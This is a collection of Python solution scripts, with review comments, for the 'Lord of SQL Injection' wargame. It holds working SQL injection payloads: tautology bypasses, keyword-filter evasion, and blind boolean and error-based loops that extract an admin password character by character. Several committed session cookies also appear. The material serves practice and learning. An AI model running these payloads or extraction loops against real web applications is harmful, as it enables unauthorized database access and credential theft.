├── 10_Skeleton.py
├── 11_Golem.py
├── 12_Darknight.py
├── 13_Bugbear.py
├── 14_Giant.py
├── 15_Assassin.py
├── 16_Zombie_Assassin.py
├── 17_Succubus.py
├── 18_Nightmare.py
├── 19_Xavis.py
├── 1_Gremline.py
├── 21_Iron_golem.py
├── 22_Dark_eyes.py
├── 2_Cobolt.py
├── 3_Goblin.py
├── 4_Orc.py
├── 5_Wolfman.py
├── 6_DarkElf.py
├── 7_Orge.py
├── 8_Troll.py
├── 9_Vampire.py
└── README.md
/10_Skeleton.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 | # Lord of SQL Injection "Skeleton": send one crafted pw value and check the reply for the clear banner.
4 | # Set the URL. The pw value below URL-decodes to: '||id='admin'#
5 | url = "http://los.eagle-jump.org/skeleton_8d9cbfe1efbd44cfbbdc63fa605e5f1b.php"
6 | param = "?pw=%27||id=%27admin%27%23"
7 | new_url = url + param
8 |
9 | # Set the cookie. It must be your own session cookie.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 | # NOTE(review): a session ID is committed here and sent over plain http://; treat it as exposed and read it at run time instead.
12 |
13 | # Send the HTTP request.
14 | r = get(new_url, cookies=cookies)
15 | # find() > 0 skips a hit at offset 0. The literal below is broken across lines in this listing; confirm the marker against the original file.
16 | if r.text.find("
SKELETON Clear!
") > 0:
17 | print("축하합니다! Skeleton을 클리어했습니다!")
18 |
19 |
--------------------------------------------------------------------------------
/11_Golem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 | # Lord of SQL Injection "Golem": recover the admin pw bit by bit from a true/false ("Hello admin") response.
4 | import requests
5 | import sys # module for exit()
6 | from sys import stdout # module for fflush()
7 |
8 | # NOTE(review): raw_input() below and the print statements later in the file are Python 2 syntax.
9 | print("#### Lord of SQL Injection - Golem ####\n")
10 |
11 | # Set the challenge URL (plain http://, so the session cookie travels unencrypted).
12 | url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php"
13 |
14 | session = raw_input("Input your LOS session : ")
15 | # session = "lqaa55h0s48l8h06rc9sguktt0"
16 | # NOTE(review): the commented-out line above leaves a session ID in the repository; remove it and invalidate that session.
17 | # Set header to set cookie
18 | headers = {
19 | 'Cookie': 'PHPSESSID={0}'.format(session)
20 | }
21 |
22 |
23 | """ The valuble for storing admin password """
24 | password = ""
25 | # query is incremented once per request in the bit-extraction loop further down.
26 | query = 0
27 |
28 | # The bare string below is the author's list of tokens the challenge rejects (presumably a server-side keyword filter).
29 | # Server side, the durable fix for this class of flaw is a parameterized query; a token blacklist does not provide it.
30 | """
31 | No Hack Words :
32 | - prob
33 | - _
34 | - .
35 | - ()
36 | - or
37 | - and
38 | - substr(
39 | - =
40 |
41 | """
42 |
43 |
44 | def replace(param):
45 | param = str(param)
46 | # Rewrite tokens from the "No Hack Words" list into alternative spellings; "#" becomes %23 for use in a URL.
47 | param = param.replace("or", "||")
48 | param = param.replace("and", "%26%26")
49 | param = param.replace("=", " like ")
50 | param = param.replace("substr(", "mid(")
51 | param = param.replace("#", "%23")
52 | # These are plain substring replacements, so "or"/"and" inside longer words are rewritten too. "prob" has no rewrite: report and exit.
53 | if "prob" in param:
54 | print "Your param has 'prob'!"
55 | sys.exit()
56 | # Returns the rewritten string.
57 | return param
58 |
59 |
60 |
61 | # Get the length of the password: try 0..99 until the response contains "Hello admin".
62 | for i in range(100):
63 | param = replace("' or length(pw)={0}#".format(i))
64 | content = requests.get(url + "?pw=" + param, headers=headers).text
65 | # NOTE(review): if no value matches, `length` is never assigned and line 75 raises NameError.
66 | if content.find("Hello admin
") > -1:
67 | length = i
68 | print "[*] The length of pw : {0}".format(i)
69 |
70 | break
71 |
72 | # Each character is read as bits: the query left-pads bin(ascii(char)) to 7 digits and tests one digit per request.
73 | # This loop builds its query by hand instead of calling replace(), and only this loop increments `query`.
74 | print("\n\n#### Starting Blind SQL Injection ####\n")
75 | for i in range(1, length + 1):
76 | binary = ''
77 | for j in range(0, 8):
78 | param = "?pw=' || id like 'admin' %26%26 (select mid(lpad(bin(ascii(mid(pw,{0},1))),7,0),{1},1) like 1)%23".format(i, j)
79 | content = requests.get(url + param, headers=headers).text
80 | query += 1
81 | # j runs 0..7 while lpad() yields 7 digits; position 0 presumably never matches and contributes a leading '0' - confirm.
82 | if content.find("Hello admin") > 0:
83 | binary += '1'
84 | else:
85 | binary += '0'
86 |
87 | password += chr(int(binary, 2))
88 |
89 | print chr(int(binary, 2)), "({0})".format(binary)
90 | stdout.flush()
91 |
92 | print "\n[*] the password : ", password
93 |
94 | # Submit the recovered value as pw and look for the clear banner.
95 | # The banner literal on line 99 is broken across lines in this listing; confirm the marker against the original file.
96 | url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw={0}".format(password)
97 | r = requests.get(url, headers=headers)
98 |
99 | if r.text.find("GOLEM Clear!
") > 0:
100 | print "[*] message : Golem Clear!"
101 |
102 | print "[*] total queries : {0}".format(query)
103 |
104 |
--------------------------------------------------------------------------------
/12_Darknight.py:
--------------------------------------------------------------------------------
1 | # -*- coding : UTF-8 -*-
2 | from requests import get
3 | import string
4 | # Lord of SQL Injection "Darknight": find the pw length, then recover pw one character at a time via the `no` parameter.
5 | print("#### Lord of SQL Injection - Darknight ####\n")
6 |
7 | # Set the URL.
8 | url = "http://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php"
9 | # NOTE(review): the session ID below is committed in source and sent over plain http://; treat it as exposed and read it at run time.
10 | # Set the cookie. It must be set to your own cookie.
11 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
12 | abc = string.digits + string.ascii_letters # candidate characters (digits and ASCII letters) for the brute-force loop
13 | result = ""
14 |
15 | # Guess the length of pw (1..19). The payload uses no quotes and `like` in place of `=`; 97 is the code of "a".
16 | for i in range(1,20):
17 | param = "?no=1 || ord(id) like 97 %26%26length(pw) like " + str(i)
18 | new_url = url + param
19 | r = get(new_url, cookies=cookies)
20 | # idLength stores length + 1 (the exclusive bound for range() below). It stays unassigned if no length matches.
21 | if r.text.find("Hello admin
") > 0:
22 | idLength = i + 1
23 | print("pw의 길이는 " + str(i) + " 입니다.")
24 | break
25 |
26 | # The probe below uses `<>`, so the signal is inverted: a response WITHOUT "Hello admin" means the candidate matched.
27 | # Using that length, run the blind SQL injection.
28 | print("\n\n#### Starting Blind SQL Injection ####\n")
29 | for i in range(1, idLength):
30 | for a in abc:
31 | param = "?no=1 or ord(id) like 97 %26%26 ord(mid(pw," + str(i) + ",1)) <> " + str(ord(a))
32 | new_url = url + param
33 | r = get(new_url, cookies=cookies)
34 |
35 | if r.text.find("Hello admin
") == -1:
36 | print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ")
37 | result += a
38 | break
39 | # NOTE(review): indentation is lost in this listing, so the nesting of the two checks below cannot be confirmed from here.
40 | if i == 1 and result == "":
41 | print("FAIL")
42 | exit(-1)
43 |
44 | if i == idLength-1:
45 | print("\n\n#### RESULT ####")
46 | print("pw : " + result)
47 | # Submit the recovered value as pw and look for the clear banner (literal is broken across lines in this listing).
48 | url = "http://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=" + result
49 | r = get(url, cookies=cookies)
50 |
51 | if r.text.find("DARKKNIGHT Clear!
") > 0:
52 | print("축하합니다! Darknight를 클리어했습니다.")
53 |
54 |
--------------------------------------------------------------------------------
/13_Bugbear.py:
--------------------------------------------------------------------------------
1 | # -*- coding : UTF-8 -*-
2 | from requests import get
3 | import string
4 | # Lord of SQL Injection "Bugbear": find the pw length, then recover pw one character at a time via the `no` parameter.
5 | print("#### Lord of SQL Injection - Bugbear ####\n")
6 |
7 | # Set the URL.
8 | url = "http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php"
9 | # NOTE(review): the session ID below is committed in source and sent over plain http://; treat it as exposed and read it at run time.
10 | # Set the cookie. It must be set to your own cookie.
11 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
12 | abc = string.digits + string.ascii_letters # candidate characters (digits and ASCII letters) for the brute-force loop
13 | result = ""
14 |
15 | # Guess the length of pw (1..19). The payload has no spaces or quotes and uses in(...) and <> for comparison; 61 is hex for "a".
16 | for i in range(1,20):
17 | param = "?no=1||hex(mid(id,1,1))in(61)%26%26length(pw)<>" + str(i)
18 | new_url = url + param
19 | r = get(new_url, cookies=cookies)
20 | # Inverted signal: a response WITHOUT "Hello admin" means the length matched. idLength stores length + 1.
21 | if r.text.find("Hello admin
") == -1:
22 | idLength = i + 1
23 | print("pw의 길이는 " + str(i) + " 입니다.")
24 | break
25 |
26 | # NOTE(review): any failed request (error page, expired session) also lacks "Hello admin" and would be read as a match.
27 | # Using that length, run the blind SQL injection.
28 | print("\n\n#### Starting Blind SQL Injection ####\n")
29 | for i in range(1, idLength):
30 | for a in abc:
31 | ab = str(hex(ord(a))).replace("0x", "")
32 | param = "?no=1||hex(mid(id,1,1))in(61)%26%26hex(mid(pw," + str(i) + ",1))<>" + ab
33 | new_url = url + param
34 | r = get(new_url, cookies=cookies)
35 |
36 | if r.text.find("Hello admin
") == -1:
37 | print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ")
38 | result += a
39 | break
40 | # NOTE(review): indentation is lost in this listing, so the nesting of the two checks below cannot be confirmed from here.
41 | if i == 1 and result == "":
42 | print("FAIL")
43 | exit(-1)
44 |
45 | if i == idLength-1:
46 | print("\n\n#### RESULT ####")
47 | print("pw : " + result)
48 | # Submit the recovered value as pw and look for the clear banner (literal is broken across lines in this listing).
49 | url = "http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=" + result
50 | r = get(url, cookies=cookies)
51 |
52 | if r.text.find("BUGBEAR Clear!
") > 0:
53 | print("축하합니다! Bugbear를 클리어했습니다.")
54 |
55 |
--------------------------------------------------------------------------------
/14_Giant.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 | import random
4 | # Lord of SQL Injection "Giant": send a single whitespace-like byte in the `shit` parameter and check for the clear banner.
5 | # Set the URL.
6 | url = "http://los.eagle-jump.org/giant_9e5c61fc7f0711c680a4bf2553ee60bb.php"
7 |
8 | # Store the accepted separator bytes: %0b is vertical tab and %0c is form feed.
9 | new_tab = ["%0b", "%0c"]
10 |
11 | # Pick one of the two bytes above at random.
12 | rand_int = random.randint(0,1)
13 | param = "?shit=" + new_tab[rand_int]
14 | new_url = url + param
15 |
16 | # Set the cookie. It must be your own session cookie.
17 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
18 | # NOTE(review): a session ID is committed here and sent over plain http://; treat it as exposed and read it at run time instead.
19 |
20 | # Send the HTTP request.
21 | r = get(new_url, cookies=cookies)
22 | # find() > 0 skips a hit at offset 0. The literal below is broken across lines in this listing; confirm the marker against the original file.
23 | if r.text.find("GIANT Clear!
") > 0:
24 | print("축하합니다! Giant을 클리어했습니다!")
25 |
26 |
--------------------------------------------------------------------------------
/15_Assassin.py:
--------------------------------------------------------------------------------
1 | # -*- coding : UTF-8 -*-
2 | from requests import get
3 | import string
4 | # Lord of SQL Injection "Assassin": grow a pw prefix one character at a time, sending prefix + "%" on each request.
5 | print("#### Lord of SQL Injection - Assassin ####\n")
6 |
7 | # Set the URL.
8 | url = "http://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php"
9 | # NOTE(review): the session ID below is committed in source and sent over plain http://; treat it as exposed and read it at run time.
10 | # Set the cookie. It must be set to your own cookie.
11 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
12 |
13 | # Candidate characters (digits and ASCII letters) for the brute-force loop.
14 | abc = string.digits + string.ascii_letters
15 |
16 | result = ""
17 | # The trailing "%" is presumably a LIKE wildcard on the server side; the query itself is not visible here.
18 | # Run the blind SQL injection.
19 | print("\n\n#### Starting Blind SQL Injection ####\n")
20 | identify = 0
21 | for i in range(1,20):
22 | for a in abc:
23 | param = "?pw=" + result + a + "%"
24 | new_url = url + param
25 | r = get(new_url, cookies=cookies)
26 | # `identify` is set here but never read in this listing. Both literals below are broken across lines by extraction.
27 | if r.text.find("Hello guest
") > 0:
28 | identify = 1
29 | print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ")
30 | result += a
31 | if r.text.find("ASSASSIN Clear!
") > 0:
32 | print("축하합니다! Orge를 클리어했습니다.")
33 | # NOTE(review): the message on line 32 names "Orge" although the check is for the ASSASSIN banner (copy-paste slip).
34 | # Stop once a position produced no new character; indentation is lost here, so the exact nesting cannot be confirmed.
35 | if len(result) < (i-1):
36 | break
37 |
38 | print("\n\n#### RESULT ####")
39 | print("pw : " + result)
40 |
--------------------------------------------------------------------------------
/16_Zombie_Assassin.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 | # Lord of SQL Injection "Zombie Assassin": send one crafted pw value and check the reply for the clear banner.
4 | # Set the URL. The pw value below URL-decodes to a NUL byte followed by: 'or'1'='1
5 | url = "http://los.eagle-jump.org/zombie_assassin_14dfa83153eb348c4aea012d453e9c8a.php"
6 | param = "?pw=%00%27or%271%27=%271"
7 | new_url = url + param
8 |
9 | # Set the cookie. It must be your own session cookie.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 | # NOTE(review): a session ID is committed here and sent over plain http://; treat it as exposed and read it at run time instead.
12 |
13 | # Send the HTTP request.
14 | r = get(new_url, cookies=cookies)
15 | # find() > 0 skips a hit at offset 0. The literal below is broken across lines in this listing; confirm the marker against the original file.
16 | if r.text.find("ZOMBIE_ASSASSIN Clear!
") > 0:
17 | print("축하합니다! Zombie assassin을 클리어했습니다!")
18 |
19 |
--------------------------------------------------------------------------------
/17_Succubus.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 | # Lord of SQL Injection "Succubus": send crafted id and pw values and check the reply for the clear banner.
4 | # Set the URL. id ends in a backslash and pw decodes to: or 1=1#  ("\&" is not a Python escape, so the backslash is kept).
5 | url = "http://los.eagle-jump.org/succubus_8ab2d195be2e0b10a3b5aa2873d0863f.php"
6 | param = "?id=asdf\&pw=or%201=1%23"
7 | new_url = url + param
8 |
9 | # Set the cookie. It must be your own session cookie.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 | # NOTE(review): a session ID is committed here and sent over plain http://; treat it as exposed and read it at run time instead.
12 |
13 | # Send the HTTP request.
14 | r = get(new_url, cookies=cookies)
15 | # find() > 0 skips a hit at offset 0. The literal below is broken across lines in this listing; confirm the marker against the original file.
16 | if r.text.find("SUCCUBUS Clear!
") > 0:
17 | print("축하합니다! Succubus를 클리어했습니다!")
18 |
19 |
--------------------------------------------------------------------------------
/18_Nightmare.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 | # Lord of SQL Injection "Nightmare": send one crafted pw value and check the reply for the clear banner.
4 | # Set the URL. The pw value below URL-decodes to: ')<1; followed by a NUL byte.
5 | url = "http://los.eagle-jump.org/nightmare_ce407ee88ba848c2bec8e42aaeaa6ad4.php"
6 | param = "?pw=%27)<1;%00"
7 | new_url = url + param
8 |
9 | # Set the cookie. It must be your own session cookie.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 | # NOTE(review): a session ID is committed here and sent over plain http://; treat it as exposed and read it at run time instead.
12 |
13 | # Send the HTTP request.
14 | r = get(new_url, cookies=cookies)
15 | # find() > 0 skips a hit at offset 0. The literal below is broken across lines in this listing; confirm the marker against the original file.
16 | if r.text.find("NIGHTMARE Clear!
") > 0:
17 | print("축하합니다! Nightmare를 클리어했습니다!")
18 |
19 |
--------------------------------------------------------------------------------
/19_Xavis.py:
--------------------------------------------------------------------------------
1 | # -*- coding : UTF-8 -*-
2 | # Every character of pw has a code above 160, so the scan starts at 160 for efficiency.
3 | import requests
4 | # Lord of SQL Injection "Xavis": recover 10 characters of the admin pw by testing one character code per request.
5 | # Set cookies. NOTE(review): this session ID is committed in source and sent over plain http://; treat it as exposed.
6 | cookies = dict(PHPSESSID='gsen5qt14q70cvj5doeee5lvp1')
7 |
8 | result = ""
9 | hexacode = '0x'
10 | for i in range(1,11):
11 | print("-" * 25)
12 | print("[=] Testing %d character" % i)
13 | print('-' * 25)
14 | for ascii in range(160, 1000):
15 | if i == 2 or i == 6:
16 | ascii += 40
17 | url = 'http://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php'
18 | url += "?pw=1'||ord(id)=97%26%26ord(mid(pw,{0},1))={1}%23".format(i, ascii)
19 | #print "[=] Testing url : " + url
20 | # NOTE(review): `ascii` shadows the builtin; the += 40 on line 16 shifts only the current iteration (positions 2 and 6 scan 200..1039).
21 | r = requests.get(url, cookies=cookies)
22 | # A response containing "Hello admin" means the tested code equals the character at position i.
23 | if r.text.find("Hello admin") > -1:
24 | char = chr(ascii)
25 | hexacode += str(hex(ascii)).replace('0x', '')
26 | print("\n[*] %d character is %s (ascii code : %d)\n\n" % (i, char, ascii))
27 | result += char
28 | break
29 | # Print the recovered string and the concatenated hex digits of the matched codes.
30 | print("\n\n\n[*] admin's password : %s(hexacode : %s)" % (result, hexacode))
31 |
32 |
33 |
--------------------------------------------------------------------------------
/1_Gremline.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 | # Lord of SQL Injection "Gremlin": send one crafted id value and check the reply for the clear banner.
4 | from requests import get
5 |
6 | # Challenge URL (plain http://, so the session cookie travels unencrypted).
7 | url = "http://los.eagle-jump.org/gremlin_bbc5af7bed14aa50b84986f2de742f31.php"
8 |
9 | # Set PHPSESSID by user input. NOTE(review): under Python 2, input() evaluates what is typed; raw_input() is the safe call there.
10 | session = input("Input your LOS session : ")
11 | # session = "gequo9hff2f19sjmieftjnuf50"
12 | # NOTE(review): the commented-out line above leaves a session ID in the repository; remove it and invalidate that session.
13 | headers = {
14 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
15 | 'Accept-Encoding': 'gzip, deflate, br',
16 | 'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
17 | 'Cookie': 'PHPSESSID={0}'.format(session)
18 | }
19 | # The id value below decodes to 'or'1'='1'# : an always-true condition followed by a comment marker.
20 | param = "?id='or'1'='1'%23"
21 |
22 | r = get(url + param , headers=headers)
23 | # find() > 0 skips a hit at offset 0. The literal below is broken across lines in this listing; confirm the marker against the original file.
24 | if r.text.find("GREMLIN Clear!
") > 0:
25 | print("Gremlin Clear!")
26 |
--------------------------------------------------------------------------------
/21_Iron_golem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 | import requests
4 | # Lord of SQL Injection "Iron golem": uses a database error message in the response as the true/false signal.
5 | # Set cookies. NOTE(review): this session ID is committed in source and sent over plain http://; treat it as exposed.
6 | cookies = dict(PHPSESSID="gequo9hff2f19sjmieftjnuf50")
7 |
8 | # The script depends on the page echoing the text "Subquery returns more than 1 row".
9 | # Returning a generic error page instead of database error text would remove that signal.
10 | # pw Length guessing
11 | print("Starting pw guessing")
12 | for i in range(1, 100):
13 | url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
14 | payload = "?pw=1'||if(length(pw)="+str(i)+",1,(select%201%20union%20select%202))%23"
15 | url += payload
16 | # Error text present -> condition false; absent -> condition true (any other failure also counts as true).
17 | r = requests.get(url, cookies=cookies)
18 | if r.text.find("Subquery returns more than 1 row") > -1:
19 | print("[*] pw의 길이는 %2d가 아닙니다. " % i)
20 | else :
21 | print("[*] pw의 길이는 %2d입니다!" % i)
22 | length = i
23 | break
24 |
25 | # Second pass: for each position, report whether the character code is greater than 31.
26 | # start pwning
27 | print("\n\n\n")
28 | print("[+] Configuring pw")
29 | for i in range(1, length+1):
30 | pwn = 31
31 | url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
32 | payload = "?pw=1%27||if(ord(mid(pw,"+str(i)+",1))>"+str(pwn)+",1,(select%201%20union%20select%202))%23"
33 | url += payload
34 |
35 | r = requests.get(url, cookies=cookies)
36 | if r.text.find("Subquery returns more than 1 row") > -1:
37 | print("[*] pw의 %2d번째에 값이 없습니다." % (i))
38 | else :
39 | print("[*] pw의 %2d번째에 값이 있습니다!" % (i))
40 |
41 | # NOTE(review): the loop below is fixed to positions 1..4 and codes 31..99; it ignores `length` found above.
42 | print("\n\n\n")
43 | result = ""
44 | print("[+] Starting to pwn")
45 | for i in range(1,5):
46 | for j in range(pwn, 100):
47 | url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
48 | payload = "?pw=1%27||if(ord(mid(pw,"+str(i)+",1))="+str(j)+",1,(select%201%20union%20select%202))%23"
49 | url += payload
50 |
51 | r = requests.get(url, cookies=cookies)
52 | if r.text.find("Subquery returns more than 1 row") > -1:
53 | print("[*] pw의 %d번째 값은 %d가 아닙니다. " % (i, j))
54 | else :
55 | print("[*] pw의 %d번째 값은 %d입니다! " % (i, j))
56 | result += chr(j)
57 | break
58 |
59 | print("\n\n\n[+] result : " + result + "\n")
60 |
--------------------------------------------------------------------------------
/22_Dark_eyes.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding : UTF-8 -*-
3 |
4 | import requests
5 | import string
6 |
7 | # url encoding: hand-rolled percent-encoding of a payload string. "&" becomes %26%26 (two ampersands) and "%" itself is not escaped.
8 | def urlQuery(url):
9 | url = url.replace("#", "%23")
10 | url = url.replace(" ", "%20")
11 | url = url.replace("'", "%27")
12 | url = url.replace("&", "%26%26")
13 | url = url.replace(">", "%3E")
14 | url = url.replace("<", "%3C")
15 | # Returns the rewritten string; characters outside the six handled above pass through unchanged.
16 | return url
17 |
18 | cookies = dict(PHPSESSID="8nprcactb6uekd9ocb96q3fh17")
19 | url = "http://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php"
20 | # NOTE(review): the session ID above is committed in source and sent over plain http://; treat it as exposed and read it at run time.
21 | # Candidate characters; only ord(a) of each is placed in the query, so "#", "&" and "%" here are never sent literally.
22 | abc = string.ascii_letters + string.digits + "!@#$%^&*()_-{}[];:><,./?"
23 |
24 | # select * from test where id='admin' and pw='' or ord(id)=97 and (length(pw)=0 or (select 1 union select pw))
25 | # The line above is the author's sketch of the resulting query; the server-side statement is not shown in this listing.
26 | # Signal used below: a response body shorter than 5 characters is treated as "condition false".
27 | # NOTE(review): if no length matches, `length` is never assigned and line 44 raises NameError.
28 | # pw length config
29 | print("[+] pw length config \n")
30 | for i in range(0, 100):
31 | payload = "?pw=' OR ord(id)=97 and (length(pw)=" + str(i) + " or (select 1 union select pw))#"
32 | payload = urlQuery(payload)
33 | r = requests.get(url+payload, cookies=cookies)
34 |
35 | if len(r.text) < 5:
36 | print("[-] Err0r was f0und. - the length of the 'pw' is not " + str(i))
37 | else :
38 | print("[*] the length of 'pw' is " + str(i))
39 | length = i
40 | break
41 | # Second pass: test each candidate character at each position. This loop does not pass its payload through urlQuery().
42 | result = ""
43 | print("\n\n=====================\n\nblind sqli start\n")
44 | for i in range(1, (length+1)):
45 | for a in abc:
46 | payload = "?pw=' OR ord(id)=97 AND (ord(mid(pw,"+str(i)+",1))="+str(ord(a))+\
47 | " or (select 1 union select pw))%23"
48 |
49 | r = requests.get(url+payload, cookies=cookies)
50 |
51 | if len(r.text) < 5:
52 | print("[-] Err0r was f0und. (%d, %c)" %(i, a))
53 | else:
54 | print("[*] the %d pw is %c" % (i, a))
55 | result += a
56 | break
57 |
58 | print("[=] the result : " + result)
59 |
--------------------------------------------------------------------------------
/2_Cobolt.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 | import requests
4 | # Lord of SQL Injection "Cobolt": send one crafted id value and check the reply. The id decodes to: admin'#
5 | url = "http://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php"
6 | param = "?id=admin'%23"
7 | # NOTE(review): the typed value becomes the whole Cookie header on line 12, so it must include the "PHPSESSID=" prefix.
8 | cookie = input("Input your session : ")
9 | # cookie = "5u71g5vp7547tv8ffl7osl0fl5"
10 | # NOTE(review): the commented-out line above leaves a session ID in the repository; remove it and invalidate that session.
11 | headers = {
12 | 'Cookie': cookie
13 | }
14 |
15 | r = requests.get(url + param, headers=headers)
16 | # find() > 0 skips a hit at offset 0. The literal below is broken across lines in this listing; confirm the marker against the original file.
17 | if r.text.find("COBOLT Clear!
") > 0:
18 | print("Cobolt Clear!")
19 |
--------------------------------------------------------------------------------
/3_Goblin.py:
--------------------------------------------------------------------------------
1 | # -*- coding : UTF-8 -*-
2 | from requests import get
3 | # Lord of SQL Injection "Goblin": send one crafted `no` value and check the reply for the clear banner.
4 | url = "http://los.eagle-jump.org/goblin_5559aacf2617d21ebb6efe907b7dded8.php"
5 | # Solve the challenge with MySQL's substr(). The value decodes to: 0 or ascii(substr(id,1,1))=97  (97 is "a"; no quotes are used).
6 | param = "?no=0%20or%20ascii(substr(id,1,1))=97"
7 |
8 | new_url = url + param
9 |
10 | # Set the cookie. Be sure to use your own cookie.
11 | cookie = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
12 | # NOTE(review): a session ID is committed here and sent over plain http://; treat it as exposed and read it at run time instead.
13 | # find() > 0 skips a hit at offset 0. The literal on line 15 is broken across lines in this listing; confirm the marker against the original file.
14 | r = get(new_url, cookies=cookie)
15 | if r.text.find("GOBLIN Clear!
") > 0:
16 | print("축하합니다! Goblin을 클리어했습니다!")
17 |
--------------------------------------------------------------------------------
/4_Orc.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: UTF-8 -*-
3 | import requests
4 | from sys import stdout
5 | # Lord of SQL Injection "Orc": recover the admin pw bit by bit from a true/false ("Hello admin") response. Python 2 syntax.
6 | query = 0
7 | print("#### Lord of SQL Injection - Orc ####\n")
8 |
9 | url = "http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php"
10 |
11 | # NOTE(review): the commented-out line below leaves a session ID in the repository; remove it and invalidate that session.
12 | # session = "gequo9hff2f19sjmieftjnuf50"
13 | session = raw_input("Input your LOS session : ")
14 |
15 | headers = {
16 | 'Cookie': 'PHPSESSID={0}'.format(session)
17 | }
18 |
19 | password = ""
20 |
21 | # Get the length of the password: try 0..99 until the response contains "Hello admin".
22 | for i in range(100):
23 | param = "?pw=' or id='admin' and length(pw)={0}%23".format(i)
24 |
25 | content = requests.get(url + param, headers=headers).text
26 | query += 1
27 | # NOTE(review): if no value matches, `length` is never assigned and line 40 raises NameError.
28 | if content.find("Hello admin") > -1:
29 | length = i
30 | print "[*] The length of admin password : {0}".format(i)
31 | break
32 |
33 | # Each character is read as bits: the query left-pads bin(ascii(char)) to 7 digits and tests one digit per request.
34 | print("\n\n#### Starting Blind SQL Injection ####\n")
35 | # substr(lpad(bin(ascii(substr('asdf',1,1))),7,0),1,1)
36 |
37 | print "[*] the password : ",
38 | stdout.flush()
39 |
40 | for i in range(1, length+1):
41 |
42 | binary = ''
43 | for j in range(0, 8):
44 | param = "?pw=' or id='admin' and (select substr(lpad(bin(ascii(substr(pw,{0},1))),7,0),{1},1)=1)%23".format(i, j)
45 | content = requests.get(url + param, headers=headers).text
46 | query += 1
47 | # j runs 0..7 while lpad() yields 7 digits; position 0 presumably never matches and contributes a leading '0' - confirm.
48 | if content.find("Hello admin") > 0:
49 | binary += '1'
50 | else:
51 | binary += '0'
52 |
53 | password += chr(int(binary, 2))
54 |
55 | print chr(int(binary, 2)),
56 | stdout.flush()
57 |
58 | print "\n[*] the password : ", password
59 |
60 | # NOTE(review): line 62 appends `param` (the last probe's query string) to a URL that already ends in ?pw=<password>.
61 | url = "http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw={0}".format(password)
62 | content = requests.get(url + param, headers=headers).content
63 | # The banner literal below is broken across lines in this listing; confirm the marker against the original file.
64 | if content.find("ORC Clear!
") > 0:
65 | print "ORC Clear!"
66 |
67 | print "[+] total query : {0}".format(query)
--------------------------------------------------------------------------------
/5_Wolfman.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 |
4 | import requests
5 | import urllib
6 |
7 |
8 | def urlencode(query):
9 | replacement = {
10 | '#': '%23',
11 | '&': '%26',
12 | ' ': '%20',
13 | '=': '%3D',
14 | '+': '%2B',
15 | '\'': '%27',
16 | '%': '%25'
17 | }
18 | # Meant to percent-encode query. NOTE(review): str.replace() returns a new string and the result is discarded, so query comes back unchanged.
19 | for r in replacement:
20 | query.replace(r, replacement[r])
21 | # Assigning the result back would also re-encode the "=" and "%23" the caller already wrote; standard-library quoting of the value alone is safer.
22 | return query
23 |
24 | # Set the URL. The pw value passed below reads: '||id='admin'# (with "#" already written as %23).
25 | url = "http://los.eagle-jump.org/wolfman_f14e72f8d97e3cb7b8fe02bef1590757.php"
26 | param = urlencode("?pw='||id='admin'%23")
27 |
28 | # NOTE(review): line 38 is a Python 2 print statement, and under Python 2 input() evaluates what is typed; use raw_input() there.
29 | session = input("Input your LOS session : ")
30 | headers = {
31 | 'Cookie': 'PHPSESSID={0}'.format(session)
32 | }
33 |
34 | # Send the request over plain http://, so the session cookie travels unencrypted.
35 | r = requests.get(url + param, headers=headers)
